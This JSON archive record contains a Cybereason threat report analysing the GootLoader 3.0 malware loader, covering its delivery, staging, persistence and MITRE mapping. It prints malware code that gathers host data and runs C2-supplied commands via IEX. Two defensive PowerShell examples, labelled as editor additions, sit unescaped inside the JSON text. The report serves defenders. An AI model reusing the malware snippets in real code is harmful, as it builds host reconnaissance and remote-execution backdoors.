{
	"id": "4f1156dc-74ba-4d06-97bb-895b7f00c42f",
	"created_at": "2026-04-06T03:36:17.453439Z",
	"updated_at": "2026-04-10T03:33:12.685714Z",
	"deleted_at": null,
	"sha1_hash": "422e5b4bbd6ee2517cba7bdea3b5bb73a7e392a0",
	"title": "I am Goot (Loader)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 901851,
	"plain_text": "I am Goot (Loader)\r\nBy Cybereason Security Services Team\r\nArchived: 2026-04-06 03:18:50 UTC\r\nCybereason Security Services issues Threat Analysis reports to inform on threats that impact organizations. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them.\r\nIn this Threat Analysis report, Cybereason Security Services investigates the rising activity of the GootLoader malware.\r\nKEY POINTS\r\nDon't stop me now: GootLoader remains in active use and development by threat actors, with no loss of popularity in sight.\r\nGootLoader evolved: Updates to the GootLoader payload have resulted in several versions of GootLoader, with GootLoader 3 currently in active use.\r\nIf it ain't broke, don't fix it: While some of the particulars of GootLoader payloads have changed over time, infection strategies and overall functionality remain similar to those seen in the malware’s resurgence in 2020.\r\nINTRODUCTION\r\nGootLoader Infection Flow\r\nWhat is GootLoader\r\nGootLoader is a malware loader that abuses JavaScript to download post-exploitation malware/tools and persist on the infected machine. GootLoader is part of the GootKit malware family, a banking Trojan written in NodeJS that has been active since 2014. The threat actors behind GootKit, tracked by Mandiant as UNC2565, shifted towards delivering GootLoader instead of the GootKit banking Trojan.\r\nThe shift away from banking-Trojan functionality may have been foreseeable, as the threat actors had already started to deliver other malware such as REvil ransomware.\r\nGootLoader uses SEO poisoning for initial infection in order to distribute its malicious JavaScript payload to victims. 
Many of the distributed files masquerade as legal documents by including phrases such as agreements, contracts, and forms in the title.\r\nhttps://www.cybereason.com/blog/i-am-goot-loader\r\nPage 1 of 18\n\nUNC2565\r\nUNC2565, the threat actor tied to GootLoader, employs GootLoader to deploy various post-exploitation malware. In the past, the group deployed Cobalt Strike through SEO-manipulated malicious sites in order to gain unauthorized access. Following entry, UNC2565 engaged in reconnaissance and credential theft using techniques/tools such as Kerberoast and BloodHound.\r\nGootLoader primarily functions as an entry point for intrusions, facilitating the delivery of post-exploitation payloads. Some of the malware delivered in the past is as follows.\r\nBlueCrab Ransomware\r\nCobalt Strike\r\nGootKit\r\nIcedID\r\nKronos\r\nREvil Ransomware\r\nSystemBC\r\nWhile the precise motives of the group remain unclear, the variety in post-exploitation payloads suggests a financial incentive, as the threat actors behind GootLoader appear to be providing the loader to a wide range of threat actors with different purposes. The threat actors have also started to provide their own C2 and lateral movement tool, dubbed GootBot, which suggests that the group is expanding its market to reach a wider audience for financial gain.\r\nUNC2565's victimology spans a broad spectrum of victims, leveraging SEO poisoning to attract users searching for business-related documents online. The group’s use of GootLoader for initial access suggests that it does not discriminate heavily in its selection of targets, affecting a wide range of industry verticals and geographic regions.\r\nThe malware's delivery mechanism, which uses compromised websites to distribute malicious ZIP archives containing obfuscated JavaScript files, points to opportunistic targeting. 
Victims are likely chosen based on their likelihood to search for and download seemingly legitimate business documents from these websites, rather than being selected based on a specific industry or geographic location. However, the evolution of GootLoader and the introduction of new variants, such as GootBot, suggest an adaptive approach that may refine targeting over time based on the effectiveness of the campaigns and the defenses encountered in different sectors.\r\nTECHNICAL ANALYSIS\r\nThis section covers the technical analysis of the latest GootLoader version, 3.0 (as designated by Mandiant). The analysis consists of the following sections:\r\nOverview: High-level overview of the GootLoader infection chain.\r\nGootLoader 3.0 Analysis: Deep-dive analysis of GootLoader version 3.0, introducing code-level analysis of the loader.\r\nComparative Analysis: Comparison of key features between the different GootLoader versions.\r\nOverview\r\nGootLoader 3.0 Execution Flow\r\nThe GootLoader infection chain is simple on its face: sites compromised by threat actors host archives that contain the GootLoader JavaScript payload, with file names chosen to lure enterprise users looking for templates, legal documents, etc. Once the payload is executed, persistence is established, the second-stage payload is executed, and the third-stage payload is run by PowerShell to collect system information and handle C2 communication.\r\nSimple though it may seem, the use of compromised legitimate sites for C2 communication and the heavy obfuscation of the JavaScript payloads make signature-based detection a challenge. 
Further, the obfuscation itself makes payload analysis difficult to undertake successfully.\r\nInitial Infection\r\nInitial infection occurs when a user downloads an archive from a compromised website and executes the JavaScript file it contains, which is the first-stage GootLoader payload. As previously observed by Cybereason, sites that host these archive files leverage Search Engine Optimization (SEO) poisoning techniques to lure in victims that are searching for business-related files such as contract templates or legal documents. This infection vector was observed by Cybereason in our previous report on GootLoader, and the fact that it has not changed since that report's publication is a testament to how successful the threat actor believes this kind of drive-by compromise to be.\r\nFirst-Stage GootLoader Payload\r\nThe first-stage GootLoader payload is notable for its size and heavy obfuscation, with samples observed in the wild larger than 3.5MB.\r\nExecution\r\nExecution of the Stage 1 payload occurs via the Windows Script Host process wscript, where the malware drops the second-stage payload (also a large obfuscated JavaScript file) onto disk and registers a scheduled task to run it. At this point the Stage 1 payload execution ends and the Stage 2 payload is immediately executed via its scheduled task.\r\nSecond-Stage \u0026 Third-Stage Payload Executions\r\nThe Stage 2 payload execution begins with wscript but shifts its execution to an instance of cscript spawned as a child process. 
cscript then spawns an instance of PowerShell that deobfuscates a PowerShell script which, upon execution, initiates both discovery activity and C2 communications.\r\nPersistence\r\nAs previously noted, persistence is established via a scheduled task created by the Stage 1 GootLoader payload, with a task name consisting of random English words that are hard-coded in the payload.\r\nScheduled Task Created By First-Stage GootLoader Payload\r\nThe task contains parameters to run the Stage 2 GootLoader payload. Upon creation, the scheduled task is executed, the Stage 1 execution is terminated, and the Stage 2 execution begins. The scheduled task is also set to run on user logon, so Stage 2 is re-executed each time the user signs in.\r\nScheduled Task Parameters For The Second Stage GootLoader Payload\r\nCollection\r\nCollection of infected machine data is undertaken by the Stage 3 GootLoader payload via PowerShell. This includes machine-specific data such as OS version, running processes, disk usage, and environment variables, as well as an MS-SAMR SamrLookupDomainInSamServer call to collect information about the domain of which the machine is a member.\r\nGootLoader 3.0 Analysis\r\nThe threat actors behind GootLoader heavily obfuscate the code and break the execution down into three stages.\r\nStage 1\r\nThe initial infection file is an obfuscated JavaScript file whose name usually relates to legal/agreement documents, typically with a numeric ID appended. 
The following are some examples of file names observed in the wild:\r\ntexas mutual combat laws 67138.js\r\ncommon law marriage act jamaica 51570.js\r\nnurse practitioner collaborative agreement template nj 8292.js\r\nis samurai sword legal in uk 32330.js\r\npa collective agreement pay 97171.js\r\nStage 1 is responsible for deploying and executing the Stage 2 GootLoader payload. Stage 1 obfuscates itself by scattering malicious code throughout a legitimate JavaScript library, both to avoid suspicion and for anti-analysis purposes. The key points of Stage 1 GootLoader execution are as follows.\r\nScatter and segment obfuscated code\r\nObfuscate execution flow\r\nExecute Stage 2 via Scheduled Task\r\nThe threat actor splits the obfuscated code/strings into segments stored in variables and scatters them across the JavaScript code. Stage 1 deobfuscates the segmented code/strings by concatenating these variables back into one chunk. The concatenation procedure hops between various functions as part of the execution flow obfuscation.\r\nThe threat actor also obfuscates the execution flow by placing functions into an array as objects. This allows the code to call a specific function by its array index at run time, which hinders analysis.\r\nExecution Flow Obfuscation By Placing Function Into Array\r\nStage 1 consists of a main array which contains all necessary functions, and the code executes each function through a while loop. Once deobfuscation of the string/code is done, it executes the main function within the array. This function deobfuscates yet another string/code, which is responsible for carrying out Stage 2.\r\nDeobfuscation Of Strings / Code\r\nThe final deobfuscated code within the final function is responsible for the following. 
\r\nDrops Stage 2 GootLoader (JavaScript)\r\nRegisters execution of Stage 2 GootLoader as a scheduled task\r\nExecutes the scheduled task\r\nThe method used to create the Stage 2 GootLoader file varies between samples, but the end result is the same:\r\nStage 1 first writes the Stage 2 GootLoader code into an output file. This file can have a .dat or .log extension depending on the GootLoader variant.\r\nStage 1 then inflates the file by appending strings to the end of the Stage 2 code. The inflation process also varies by variant; for example, some samples concatenate the Stage 2 code in a loop, while others append random characters to the end of the code.\r\nOnce the concatenation completes, the execution flow renames the output to a .js file via the FileSystemObject GetFile method. It then registers the dropped Stage 2 file as a scheduled task and runs it using the RegisterTaskDefinition and RunEx methods of the Task Scheduler COM interface.\r\nStage 2\r\nThe Stage 2 GootLoader payload is a concatenation of the same code repeated to inflate its size, likely as an anti-analysis measure. The obfuscation method is similar to Stage 1: the payload obfuscates itself by scattering segmented obfuscated code. Once Stage 2 concatenates and deobfuscates the segmented code/strings, the execution flow enters the deobfuscated function, which is an object stored in an array.\r\nFinal Function Prior To Deploying Stage Three\r\nWithin the deobfuscated function, Stage 2 executes in the following order:\r\nChecks whether the current executing process is cscript.\r\nIf it is, Stage 2 spawns PowerShell and feeds it the obfuscated PowerShell script via exec.StdIn.WriteLine.\r\nIf not, it re-executes Stage 2 with cscript. 
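The persistence and inflation behaviour described above is observable on an endpoint: a scheduled task whose action runs wscript or cscript against a .js file, re-triggered at logon, and a Stage 2 file far larger than any legitimate script. The PowerShell below is an added hunting example written for this page; it is not code from the Cybereason report or from GootLoader itself. It assumes Windows 8/Server 2012 or later for the ScheduledTasks module, and the function name, the 30MB threshold (taken from the report's description of inflation) and the user-writable path keywords are the editor's assumptions, not indicators from the report.

```powershell
# Added hunting example (not from the report): list scheduled tasks whose action runs
# Windows Script Host against a .js file and flag the properties GootLoader exhibits.
# Task names are random English words per the report, so match on the action, not the name.
function Find-ScriptHostTask {
    param(
        # Stage 2 files are inflated to more than 30MB according to the report (assumed threshold).
        [int64]$InflationBytes = 30MB
    )
    $dq = [string][char]34   # double-quote character, used to strip quoting from the arguments
    foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        foreach ($action in $task.Actions) {
            $exe       = [string]$action.Execute
            $arguments = ([string]$action.Arguments).Replace($dq, '')
            # Only wscript/cscript actions that reference a .js file are of interest.
            if ($exe -notmatch '(?i)[wc]script' -or $arguments -notmatch '(?i)[.]js') { continue }
            # File names contain spaces (see the examples above), so take everything up to the first .js
            $scriptPath = $null
            if ($arguments -match '(?i)^(.*?[.]js)') { $scriptPath = $Matches[1].Trim() }
            $exists = ($null -ne $scriptPath) -and (Test-Path -LiteralPath $scriptPath)
            $size   = $null
            if ($exists) { $size = (Get-Item -LiteralPath $scriptPath).Length }
            # A logon trigger is what makes the task persistent across reboots.
            $logon = [bool]($task.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' })
            [pscustomobject]@{
                TaskName     = $task.TaskName
                TaskPath     = $task.TaskPath
                Host         = $exe
                ScriptPath   = $scriptPath
                SizeBytes    = $size
                Inflated     = ($null -ne $size -and $size -gt $InflationBytes)
                UserWritable = [bool]($scriptPath -match '(?i)(users|appdata|temp|programdata)')  # assumed heuristic
                LogonTrigger = $logon
                Missing      = ($null -ne $scriptPath -and -not $exists)
            }
        }
    }
}

# Run from an elevated prompt so that tasks registered under other user accounts are returned.
Find-ScriptHostTask | Sort-Object Inflated, LogonTrigger -Descending | Format-Table -AutoSize
```

A row with Inflated or LogonTrigger set, or with a script path under a user profile, is worth pulling the file for analysis; a Missing row (task still registered, script gone) indicates a partial cleanup and the task should still be removed.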
\r\nStage 3\r\nStage 3, the final payload, is a PowerShell script that is responsible for the following:\r\nDiscovery/Reconnaissance activity\r\nC2 communication to download the target malware\r\nThe discovery and reconnaissance stage fetches basic host information, which is gzip-compressed and base64-encoded in preparation for being sent to the C2 server. The information retrieved, as shown in the snippet below, is as follows:\r\nEnvironment variables (only values shorter than 99 characters): via dir env:\r\nOS version: via GWMI (alias of Get-WmiObject) against Win32_OperatingSystem\r\nUsed disk space (drives with Free greater than 50000): via GDR (alias of Get-PSDrive)\r\nList of currently running process names, plus the window titles of processes with a main window: via GPS (alias of Get-Process)\r\nDesktop contents: enumerated through the Shell.Application COM object, with each item prefixed 0 for a link, 1 for a folder, 2 for a file system object, or 3 for anything else\r\n$oVzoX = (\"ISFoLDeR|shEll.aPPLiCatioN|nAmeSPAce|itEmS|islINK|NAME|IsFiLEsYstem\").split(\"|\");\r\n$ZEwBdnB = VkmdJHx((dir env:|where{$_.value.Length -lt 99}|%{($_.name+\"^\"+$_.value)})+(\"OSWMI^\"+(gwmi Win32_OperatingSystem).caption));\r\n$TsZy = VkmdJHx(gPs|SELEcT NAME -uNiQUE|%{$_.\"NAME\"});\r\n$mVDOW = VkmdJHx(gps|WHeRE{$_.MAInWInDoWTiTLE}|%{$_.\"nAMe\"+\"^\"+$_.maiNWiNdOWTItLe});\r\n$IzJiu = VkmdJHx(((new-object -com ($oVzoX[1])).($oVzoX[2])(0)).($oVzoX[3])()|%{\r\n    if($_.($oVzoX[4])){\"0\"+$_.($oVzoX[5])}\r\n    elseif($_.($oVzoX[0])){\"1\"+$_.($oVzoX[5])}\r\n    elseif($_.($oVzoX[6])){\"2\"+[Io.pATH]::gETfIleNAME($_.PAtH)}\r\n    ElSE{\"3\"+$_.($oVzoX[5])}\r\n});\r\n$hrnrljKf = VkmdJHx(GdR|whERe{$_.FREe -GT 50000}|%{$_.\"name\"+\"^\"+$_.uSeD});\r\nSnippet Of Discovery Code (VkmdJHx is a helper defined elsewhere in the sample and not shown; the randomized casing is the malware's own obfuscation)\r\nStage 3 first fetches the host information, which is placed in the Cookie header of an HTTPS request and sent to the C2 server as the initial C2 communication, prior to the delivery of post-exploitation malware.\r\nThe C2 responds to the victim’s machine with a concatenated string that uses a specific delimiter. This delimiter is hard-coded at the beginning of the function. 
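The beacon encoding and the delimiter check described here can be reproduced offline when analysing a capture. The PowerShell below is an added example written for this page, not code from the report or from the malware: it builds a constructed beacon from two of the name^value fields the discovery code collects, decodes it again the way an analyst would decode a captured Cookie value, and applies the same exactly-three-parts delimiter check to a constructed C2 body without executing the result. The function names are the editor's; the assumption that the Cookie value is base64 over gzip of the collected strings follows the report's description, and the exact cookie name and field layout are not stated in the report.

```powershell
# Added analysis example (not from the report or the malware).
function ConvertTo-GzipBase64 {
    # Used only to build the constructed sample below; mirrors what the report says the
    # discovery code does to collected data: gzip, then base64.
    param([Parameter(Mandatory)][string]$Text)
    $out   = New-Object System.IO.MemoryStream
    $gz    = New-Object System.IO.Compression.GZipStream -ArgumentList $out, ([System.IO.Compression.CompressionMode]::Compress)
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($Text)
    $gz.Write($bytes, 0, $bytes.Length)
    $gz.Dispose()   # flushes the gzip trailer before the buffer is read
    [Convert]::ToBase64String($out.ToArray())
}

function ConvertFrom-GzipBase64 {
    # Reverse the encoding to recover host data from a captured Cookie value.
    param([Parameter(Mandatory)][string]$Base64)
    $raw = [Convert]::FromBase64String($Base64)
    $in  = New-Object System.IO.MemoryStream -ArgumentList (,$raw)
    $gz  = New-Object System.IO.Compression.GZipStream -ArgumentList $in, ([System.IO.Compression.CompressionMode]::Decompress)
    $rd  = New-Object System.IO.StreamReader -ArgumentList $gz
    try { $rd.ReadToEnd() } finally { $rd.Dispose() }
}

function Split-C2Response {
    # Same logic as the malware's response handler: split on the hard-coded delimiter and
    # return the middle element only when exactly three parts result, otherwise $null.
    # 399DCF7651 is the delimiter in the analysed sample; other samples carry their own.
    param([Parameter(Mandatory)][string]$Body, [string]$Delimiter = '399DCF7651')
    $parts = $Body -split [regex]::Escape($Delimiter)
    if ($parts.Count -ne 3) { return $null }
    return $parts[1]
}

# Constructed sample data (not real traffic): two of the name^value fields the discovery code
# collects, and two fake C2 bodies. A captured Cookie value can be passed in the same way.
$cookieValue = ConvertTo-GzipBase64 -Text 'USERDNSDOMAIN^corp.example^OSWMI^Microsoft Windows 10 Pro'
$hostData    = ConvertFrom-GzipBase64 -Base64 $cookieValue
$hostData.Split('^')                                                  # recovered fields, one per line
Split-C2Response -Body 'junk399DCF7651Write-Output hi399DCF7651junk'  # returns the middle part as text
Split-C2Response -Body 'no delimiter in this body'                    # returns $null, as the malware would do nothing
```

Keep the extracted middle element as text; the malware hands it to IEX, and that step belongs only in an isolated sandbox.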
The response is split into an array on the delimiter string, and the element at index 1 (the middle of three parts) is passed to IEX (Invoke-Expression) for execution. A response that does not split into exactly three parts is ignored.\r\n$HtlQpt = \"399DCF7651\";\r\n$hXLJr = new-obJeCt systEm.iO.STREaMReAdER $lHldi.GetreSpONSe().GetREsponSeStrEaM();\r\n$CdJwR = ($hXLJr.READtOEnd()) -SPlIT ($HtlQpt);\r\nIf($CdJwR.COuNt -EQ 3){\r\n    IEX($CdJwR[1] -RePlAce \"^\",\"\");\r\n}\r\nSnippet Of Fetching Response Code ($lHldi is the web request object, created earlier in the script and not shown)\r\nComparative Analysis\r\nThis section covers the comparative analysis of GootLoader, focusing on infection methods, obfuscation methods, and post-exploitation deployment methods. GootLoader version 1 in this section refers to and includes the JavaScript GootKit Loader observed in 2020 during the REvil campaign.\r\nAbusing SEO\r\nThreat actors have abused SEO to deliver additional post-exploitation tools/malware since late 2020, the year the technique became popular when they started to deploy GootKit and REvil ransomware together. This methodology has been used constantly ever since and its popularity shows no signs of waning. Detecting SEO poisoning comes with various challenges, and threat actors consistently use this method to mass-deploy GootLoader to victims. The SEO poisoning may also be targeted specifically at enterprise users, as the Stage 1 GootLoader file names tend to contain phrases related to legal documentation.\r\nStage 1 Control Flow Obfuscation\r\nFrom GootKit Loader to GootLoader, all variants have relied on control flow obfuscation, used in various stages. The obfuscation relies on the following two methods:\r\nSegmentation of obfuscated code\r\nPlacement of functions into an array, executing the respective index via a loop\r\nThe semantics of the code are similar throughout the different variants of GootLoader. 
The main difference between the versions is that GootLoader 2.0 and 3.0 hide themselves within legitimate JavaScript files.\r\nStage 1 Main Function Logic\r\nIn each variant, Stage 1 includes a main function which is responsible for looping through an array of functions, ultimately executing the second phase of Stage 1.\r\nStage 2 Control Flow Obfuscation\r\nThe Stage 2 control flow obfuscation differs depending on the version of GootLoader. GootLoader 1.0 and 2.0 download obfuscated Stage 2 payloads from C2 servers and store them inside the registry. Whether the download happens depends on whether the victim machine resides within an Active Directory domain (checked via the USERDNSDOMAIN environment variable, see the comparative chart below): only if the machine is domain-joined does Stage 1 download a payload. This changed starting in version 3.0, where Stage 1 deobfuscates/drops and executes the Stage 2 payload via a scheduled task instead of downloading it.\r\nStage 2 Payload Size Inflation\r\nAs part of anti-analysis and evasion, the threat actors added a feature in GootLoader 3 to inflate the size of the Stage 2 JavaScript file. The resulting size varies with the inflation method, but the Stage 2 JavaScript file tends to be inflated to more than 30MB.\r\nStage 2 JavaScript File Size Inflation\r\nStage 3 PowerShell Usage\r\nThe role of the Stage 3 PowerShell differs by version. GootLoader 1.0 and 2.0 both use PowerShell to reflectively load and execute a .NET-based DLL as the post-exploitation malware. GootLoader 3.0, by contrast, uses PowerShell both for discovery and for C2 communication that enables backdoor command execution, with the executed commands responsible for post-exploitation activity such as downloading additional malware. 
\r\nExecution Flow Of Stage 3 PowerShell\r\nTrojanized JavaScript Files\r\nGootLoader versions 2.0 and 3.0 trojanize legitimate JavaScript library files as part of their evasion techniques. There are many JavaScript libraries in the wild, and GootLoader has been observed abusing a variety of them since 2022. The following is a list of some of the trojanized JavaScript files that have been identified as GootLoader:\r\nTrojanized Target | Summary\r\nMaplace.js | JavaScript library that embeds Google Maps into a website\r\nxlsx.extendscript.js | ExtendScript build (for Photoshop and InDesign) of SheetJS, a JavaScript library for managing spreadsheets\r\njit.js | JavaScript InfoVis Toolkit, a JavaScript library for data visualization\r\ntui-chart | TOAST UI Chart, a data visualization JavaScript library\r\nmdlComponentHandler.js | Material Design Lite JavaScript library\r\nLodash | JavaScript utility library\r\njQuery | Popular JavaScript library\r\nUnderscore.js | JavaScript library of functional programming helpers\r\nData-Driven Documents (D3) | JavaScript library for data visualization\r\nComparative Chart\r\nGootLoader has received several updates during its life cycle, including changes to evasion and execution functionality. 
Here are some of the key functionalities of each version:\r\nTactic | GootLoader 1.0 | GootLoader 2.0 | GootLoader 3.0\r\nDeobfuscates and drops Stage 2 JavaScript file | - | - | ✔\r\nDeobfuscates and drops Stage 3 | - | ✔ | ✔\r\nDownloads Stage 2 JavaScript file from C2 | ✔ | ✔ | -\r\nExecutes main function of Stage 2 JavaScript via cscript | - | - | ✔\r\nFetches environment variables | - | - | ✔\r\nInitial execution is a JavaScript file | ✔ | ✔ | ✔\r\nInflates Stage 2 JavaScript file | - | - | ✔\r\nMasquerades as a legitimate JavaScript library (e.g. jQuery) | - | ✔ | ✔\r\nObfuscates payload inside registry | ✔ | ✔ | -\r\nReflectively loads post-exploitation malware | ✔ | ✔ | -\r\nScheduled Task usage | - | ✔ | ✔\r\nSEO poisoning (compromised WordPress sites) | ✔ | ✔ | ✔\r\nChecks USERDNSDOMAIN environment variable | ✔ | ✔ | -\r\nAnti-analysis with the WScript Sleep method | ✔ | ✔ | ✔\r\nMITRE ATT\u0026CK MAPPING\r\nTactic | Technique / Sub-Technique | Summary\r\nTA0042: Resource Development | T1584.006 - Compromise Infrastructure: Web Services | Threat actors abuse compromised web services (e.g. WordPress) to deliver GootLoader stagers.\r\nTA0042: Resource Development | T1608.004 - Stage Capabilities: Drive-by Target | Threat actors stage GootLoader stagers on compromised sites for drive-by download.\r\nTA0042: Resource Development | T1608.006 - Stage Capabilities: SEO Poisoning | Threat actors abuse SEO poisoning to attract users toward drive-by download of GootLoader stagers.\r\nTA0002: Execution | T1047 - Windows Management Instrumentation | Threat actors use the GWMI command to fetch the OS version. 
\r\nTA0002: Execution | T1059.001 - Command and Scripting Interpreter: PowerShell | Threat actors use obfuscated PowerShell commands for Stage 3 of GootLoader.\r\nTA0002: Execution | T1059.007 - Command and Scripting Interpreter: JavaScript | Threat actors use JavaScript for Stage 1 and Stage 2 of GootLoader.\r\nTA0003: Persistence | T1053.005 - Scheduled Task/Job: Scheduled Task | Threat actors use a scheduled task to execute Stage 2 of GootLoader and to re-run it at user logon.\r\nTA0005: Defense Evasion | T1027 - Obfuscated Files or Information | Threat actors obfuscate the JavaScript files by placing malicious code into legitimate JavaScript libraries and by other string obfuscation methods.\r\nTA0005: Defense Evasion | T1140 - Deobfuscate/Decode Files or Information | Each stage concatenates and deobfuscates its own segmented strings/code at run time before executing the next stage.\r\nTA0005: Defense Evasion | T1497.003 - Virtualization/Sandbox Evasion: Time Based Evasion | Threat actors use sleep calls for anti-analysis.\r\nTA0007: Discovery |  | Threat actors fetch environment variables, likely as part of discovery to verify the machine’s location. 
\r\nTA0007: Discovery | T1057 - Process Discovery | Threat actors use the GPS command to fetch a list of currently running processes.\r\nTA0007: Discovery | T1082 - System Information Discovery | Threat actors use the GDR command to fetch disk space usage and GWMI to fetch the OS version.\r\nTA0011: Command and Control | T1071.001 - Application Layer Protocol: Web Protocols | Threat actors communicate with the C2 over HTTPS in Stage 3 of GootLoader.\r\nTA0011: Command and Control | T1132.001 - Data Encoding: Standard Encoding | Threat actors gzip-compress and base64-encode the data sent to the C2 in Stage 3 of GootLoader.\r\nTA0011: Command and Control | T1573 - Encrypted Channel | Threat actors use TLS to communicate with the C2 in Stage 3 of GootLoader.\r\nAbout The Researchers\r\nRalph Villanueva, Senior Security Analyst, Cybereason Global SOC\r\nRalph Villanueva is a Security Analyst with the Cybereason Global SOC team. He works on hunting and combating emerging threats in the cybersecurity space. His interests include malware reverse engineering, digital forensics, and studying APTs. He earned his Master's in Network Security from Florida International University.\r\nKotaro Ogino, CTI Analyst\r\nKotaro is a CTI Analyst with the Cybereason Security Operations team. He is involved in threat hunting, threat intelligence enhancements and Extended Detection and Response (XDR). Kotaro has a Bachelor of Science degree in Information and Computer Science.\r\nGal Romano, CTI Analyst\r\nGal is a CTI Analyst with the Cybereason Security Operations team. With a six-year tenure in cybersecurity and experience as a SOC Manager, Gal has honed his skills in threat hunting and malware analysis.\r\nSource: https://www.cybereason.com/blog/i-am-goot-loader",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.cybereason.com/blog/i-am-goot-loader"
	],
	"report_names": [
		"i-am-goot-loader"
	],
	"threat_actors": [
		{
			"id": "fc7f0460-0a66-4178-9c5b-75abb22b87b0",
			"created_at": "2023-11-08T02:00:07.15123Z",
			"updated_at": "2026-04-10T02:00:03.427759Z",
			"deleted_at": null,
			"main_name": "UNC2565",
			"aliases": [
				"Hive0127"
			],
			"source_name": "MISPGALAXY:UNC2565",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775446577,
	"ts_updated_at": 1775791992,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/422e5b4bbd6ee2517cba7bdea3b5bb73a7e392a0.pdf",
		"text": "https://archive.orkl.eu/422e5b4bbd6ee2517cba7bdea3b5bb73a7e392a0.txt",
		"img": "https://archive.orkl.eu/422e5b4bbd6ee2517cba7bdea3b5bb73a7e392a0.jpg"
	}
}